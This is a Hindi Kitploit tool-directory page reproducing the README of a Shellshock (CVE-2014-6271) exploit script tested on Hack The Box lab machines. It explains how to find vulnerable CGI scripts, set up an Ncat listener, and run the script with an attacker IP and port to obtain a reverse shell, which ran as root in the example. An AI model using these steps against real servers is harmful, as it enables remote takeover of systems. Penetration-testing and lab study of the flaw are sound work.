Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2014-6271 — Shellshock exploit उर्फ CVE-2014-6271 | Kitploit
उपकरण/GitHubGitHub/b4kesn4ke/cve-2014-6271
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubb4kesn4ke/cve-2014-6271

CVE-2014-6271

Shellshock exploit उर्फ CVE-2014-6271

रिपॉजिटरी देखें
1534 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2014-6271 - Shellshock.py

Shellshock एक्सप्लॉइट उर्फ CVE-2014-6271.
Bash 3.2 और Bash 4.2 पर परीक्षण किया गया.
कमजोरी के बारे में अधिक जानकारी के लिए देखें : https://nvd.nist.gov/vuln/detail/CVE-2014-6271

नोट


एक्सप्लॉइट का मुख्य रूप से Hack The Box में निम्नलिखित बॉक्स पर परीक्षण किया गया:

  • Beep बॉक्स : https://app.hackthebox.eu/machines/Beep
  • Shocker बॉक्स : https://app.hackthebox.eu/machines/Shocker

यह एक्सप्लॉइट केवल उन वेब सर्वरों पर काम करेगा जिनमें Bash का संस्करण < 4.3 है.
कुछ मामलों में, यदि आप अपने वेब ब्राउज़र पर HTTP 200 कोड प्राप्त कर सकते हैं
`/cgi-bin/` पर GET अनुरोध करके, आप बस उस निर्देशिका के विरुद्ध एक्सप्लॉइट चलाने का प्रयास कर सकते हैं.

अन्यथा यदि आपको /cgi-bin/ निर्देशिका पर 403 मिलता है, तो फ़ाइलों की गणना करने का प्रयास करें
उस निर्देशिका के भीतर एक अच्छी वर्डलिस्ट के साथ, .sh या .cgi एक्सटेंशन खोजते हुए.

नोट: अपना TCP लिस्नर सेट अप करना न भूलें, अन्यथा एक्सप्लॉइट आपको testRevShell कॉल जांच के दौरान गलत सकारात्मक परिणाम दे सकता है

प्रूफ ऑफ कॉन्सेप्ट (POC)


सबसे पहले हम एक्सप्लॉइट द्वारा लिए जाने वाले तर्कों को देख सकते हैं, इसे चलाकर: shellshock.py -h

उदाहरण 1

फिर हम अपनी पसंद के पोर्ट पर Ncat लिस्नर सेट अप कर सकते हैं, यहाँ मैंने 45 चुना

उदाहरण 2

इसके बाद हम एक्सप्लॉइट को लिए जाने वाले सभी तर्क देकर चला सकते हैं, इसे चलाकर:
shellshock.py [OUR_IP] [OUR_LISTENNING_PORT] [TARGET_URL]
यहाँ टारगेट URL, जैसा कि आप देख सकते हैं, वह स्थान है जहाँ उस बॉक्स पर प्रमाणीकरण के दौरान वेब सर्वर POST अनुरोध भेजता है

यहाँ जैसा कि हम आउटपुट में देख सकते हैं, एक्सप्लॉइट ने सफल होने तक कई TLS संस्करणों का उपयोग करके SSL के माध्यम से पेलोड भेजने का प्रयास किया

उदाहरण 3

और यहाँ हमें अपना रिवर्स शेल मिल गया! सौभाग्य से, वेब सर्वर root के रूप में चल रहा था.

उदाहरण 4

टूल डाउनलोड करें